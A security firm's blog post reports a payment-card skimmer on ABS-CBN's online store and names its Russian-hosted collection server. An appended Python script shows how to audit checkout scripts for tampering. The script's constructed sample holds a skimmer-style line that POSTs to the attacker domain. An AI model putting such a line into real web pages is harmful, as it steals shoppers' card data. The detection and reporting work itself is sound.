ABS-CBN next in series of high profile breaches
by Sansec Forensics Team
Published in Threat Research − September 18, 2018
ABS-CBN headquarters
While Filipinos are recovering from typhoon Mangkhut, another misfortune awaits them online. We found their broadcasting giant ABS-CBN, a $740 million conglomerate and top-500 global Internet destination, to be hacked. Criminals have been running a payment skimmer on ABS-CBN's online store since at least August 16th. Personal information and credit cards are intercepted while people shop for merchandise for one of its 90+ television shows. The stolen data is sent onwards to a server registered in Irkutsk, Russia. The credit cards and identities are then (presumably) sold on the black market.
ABS-CBN is the latest target in a series of high profile skimming operations. Previously, British Airways and Ticketmaster admitted massive credit card theft of their customers. The methodology found at these crime scenes is the same: browser-based interception during the checkout process. This method is quickly gaining popularity because it defeats the security of encrypted connections (https/SSL).
Filipinos are recommended to carefully check their credit card statements for unauthorized payments.
We have notified ABS-CBN of the breach, but have not received a response.
Technical details
Sansec discovered the fraud campaign with newly released malware detection heuristics. The (obfuscated) malware is located at store.abs-cbn.com/js/lib/ccard.js (archive.org). This specific file has not been modified for four weeks, suggesting the malware was injected on or before August 16th.
$ curl -v https://store.abs-cbn.com/js/lib/ccard.js
< Last-Modified: Thu, 16 Aug 2018 06:24:34 GMT
The malware sends its stolen data to a payment collection server called adaptivecss.org. This server is on the same Russian network as coffemokko.com, a different malware campaign that we discovered earlier this week:
Just discovered the curiously named "Coffe&Tea" malware campaign. CC servers at https://t.co/pS6O7mXCbm, https://t.co/7i8JqZcNXf, https://t.co/yCiImbSyfY. They have open dirs so you can list the fake payment popups per victim. Do you recognize any of them? pic.twitter.com/TFIr4qrHjm
— Willem de Groot (@gwillem) September 13, 2018
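As an added, illustrative check (not Sansec's detection tooling), the following Python audits the scripts a checkout page loads: it flags scripts served from outside the store's own host, script content whose SHA-256 no longer matches a recorded baseline, and hostnames referenced inside a script body, which is where a skimmer has to name its collection server. The page HTML, script bodies and baseline below are constructed samples; the `fetch` callback and the `audit_scripts` function are assumed names.

```python
import hashlib
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse
HOST_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.I)

class ScriptSrcParser(HTMLParser):
    """Collect every <script src> on the page, resolved against the page URL."""
    def __init__(self, base_url):
        super().__init__()
        self.base_url, self.srcs = base_url, []
    def handle_starttag(self, tag, attrs):
        src = dict(attrs).get("src") if tag == "script" else None
        if src:
            self.srcs.append(urljoin(self.base_url, src))

def audit_scripts(page_url, html, fetch, baseline, allowed_hosts):
    """Return (script_url, finding) pairs; fetch(url) -> bytes supplies bodies."""
    parser = ScriptSrcParser(page_url)
    parser.feed(html)
    findings = []
    for url in parser.srcs:
        host = urlparse(url).hostname
        if host not in allowed_hosts:  # third-party script on a checkout page
            findings.append((url, f"served from unexpected host {host}"))
        body = fetch(url)
        if baseline.get(url) != hashlib.sha256(body).hexdigest():
            findings.append((url, "content hash differs from baseline"))
        # A skimmer has to name its drop server somewhere in the script body.
        for ref in sorted(set(HOST_RE.findall(body.decode("utf-8", "replace")))):
            if ref.lower() not in allowed_hosts:
                findings.append((url, f"references external host {ref}"))
    return findings

# Constructed sample: ccard.js no longer matches its baseline hash and now
# posts to the collection server named in the report above.
STORE = "https://store.abs-cbn.com"
PAGE_HTML = ('<html><body><script src="/js/lib/jquery.js"></script>'
             '<script src="/js/lib/ccard.js"></script></body></html>')
BODIES = {
    f"{STORE}/js/lib/jquery.js": b"/* constructed stub for jquery */",
    f"{STORE}/js/lib/ccard.js": b"/* constructed stand-in */ "
    b"fetch('https://adaptivecss.org/collect',{method:'POST'});",
}
BASELINE = {url: hashlib.sha256(b).hexdigest() for url, b in BODIES.items()}
BASELINE[f"{STORE}/js/lib/ccard.js"] = hashlib.sha256(b"/* original (constructed) */").hexdigest()
ALLOWED_HOSTS = {"store.abs-cbn.com"}

def run_sample():
    return audit_scripts(f"{STORE}/checkout/", PAGE_HTML, BODIES.__getitem__, BASELINE, ALLOWED_HOSTS)
```

In a real deployment the baseline is recorded from a known-good build and the `fetch` callback does an HTTP GET, so the same check can also compare the Last-Modified header shown above against the last deployment date.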